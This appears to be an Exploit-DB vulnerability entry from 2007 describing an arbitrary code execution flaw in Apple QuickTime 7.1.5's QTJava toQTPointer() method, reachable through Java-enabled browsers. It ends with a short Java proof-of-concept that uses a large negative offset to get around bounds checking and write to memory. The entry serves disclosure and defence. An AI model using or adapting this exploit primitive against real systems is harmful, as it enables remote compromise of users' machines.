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exploitdbShane MacaulayEDB-ID:29884
HistoryApr 23, 2007 - 12:00 a.m.

Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution

Shane Macaulay

AI Score





QuickTime is prone to a vulnerability that may aid in the remote compromise of a vulnerable computer.

The issue occurs when a Java-enabled browser is used to view a malicious website. QuickTime must also be installed.

Attackers may exploit this issue to execute arbitrary code in the context of a user running the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.

This issue is exploitable through both Safari and Mozilla Firefox running on Mac OS X. Reports indicate that Firefox on Windows platforms may also be an exploit vector.

Reports also indicate that Internet Explorer 6 and 7 running on Windows XP may be an exploit vector, but that a sandboxing feature may interfere with successful exploits. Neither of these points has been confirmed. 

// Initialize QT;

// Get a handle to anything
byte b[] = new byte[1 /*arbitrary*/];
QTHandle h = new QTHandle(b);

// Turn the handle into a pointer object. The
// large negative value throws off bounds checking.
QTPointerRef p = h.toQTPointer(-2000000000 /*off*/, 10 /*size*/);

// Write to it.
p.copyFromArray(0 /*offset*/, b /*source*/, 0, 1 /*length*/);